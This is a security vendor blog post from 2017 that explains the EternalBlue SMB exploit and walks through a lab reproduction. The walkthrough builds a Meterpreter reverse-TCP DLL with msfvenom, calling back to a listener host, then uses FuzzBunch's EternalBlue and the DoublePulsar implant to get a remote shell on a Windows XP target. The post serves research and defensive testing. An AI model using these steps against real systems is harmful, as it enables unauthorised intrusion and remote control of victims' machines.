Wei Gao, Blog Author
Senior Security Research Engineer
Blog

Deconstructing EternalBlue

May 17, 2017 by Wei Gao

EternalBlue is a server message block (SMB) vulnerability that can lead to code execution. It is part of the toolkit called FuzzBunch released by Shadow Brokers, much like the firewall toolkit we covered last August. FuzzBunch is an exploit framework, similar to MetaSploit. It contains a lot of exploits. For example, EmeraldThread is an SMB exploit for Windows XP and Server 2003 (patched by MS10-061). ErraticGopher is a SMBv1 exploit targeting Windows XP and Server 2003. EskimoRoll is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers (MS14-068). EternalBlue can be used to attack any Windows OS from XP to Server 2012.

Wannacry ransomware uses the EternalBlue exploit to propagate in a worm-like fashion. In this section, we will go through steps required to configure an environment to use the FuzzBunch framework to launch EternalBlue and use the DoublePulsar implant to get the Metasploit Meterpreter shell on a target machine.

Reproduce EternalBlue to get Meterpreter shell:

To reproduce the EternalBlue exploit, we will setup three virtual machines for testing.

Attacking machine: Windows 7 SP1, python 2.6.6 and pywind32 installed. Download Shadow Broker “Lost in Translation” leak.

Kali machine: create reverse TCP DLL and get reverse shell from target machine.

Target machine: Windows XP that is running the SMB service.

1

Using msfvenom to create a DLL format meterpreter reverse TCP shell in Kali:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.41.149 LPORT=4444 -f dll > reverser_tcp.dll

2

Next, make sure target machine is running the SMB service. TCP port 445 is opening.

2.5

In the Windows 7 attacking machine, in Shadow Brokers, dump the Windows folder. Run Python fb.py, set target IP address and callback IP address (Kali machine). Don’t use redirection in this case. FuzzBunch framework also requires log directory path. In this case, we just use c:\logs

3

To use the EternalBlue exploit in the FB terminal, type command: use eternalblue. Also, we keep the default configurations, so just hit “enter”.

4

Since the target machine is Windows XP in this case, we select XP as the target OS and select FB as delivery mechanism.

5

Launch the EternalBlue exploit until you get a successful response:

6

In the Kali machine, we set up msf multi listener to get reverse shell. Run msfconsole, set up the exploit as multi handler. Also set up lhost and lport.

7

To inject our DLL file: Back to the attacking machine, in the FuzzBunch terminal type: use doublepulsar. Select protocol SMB and backdoor type as RunDLL.

We input our reverse TCP shell generated by Kali.

8

Configure the rest of the options and execute DoublePulsar:

9

After successful DoublePulsar injected DLL, in the Kali machine we get reverse TCP shell meterpreter from target machine:

10

Ixia’s ATI-2017-09 update was rebuilt to include the EternalBlue strike responsible for this massive global attack. The strike in this updated release exploits a buffer overflow vulnerability in the Microsoft Windows SMB service. The vulnerability can be triggered when a large amount of data is sent in a Trans2 Secondary request. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary code on the target system. This strike simulates the usage of the Shadow Brokers EternalBlue exploit against both a Windows XP system and a Windows 7 system. In the BreakingPoint GUI, you can search keyword “eternalblue” and add the strike for validation.

11

Leverage Subscription Service to Stay Ahead of Attacks

The Ixia BreakingPoint Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia platforms.

References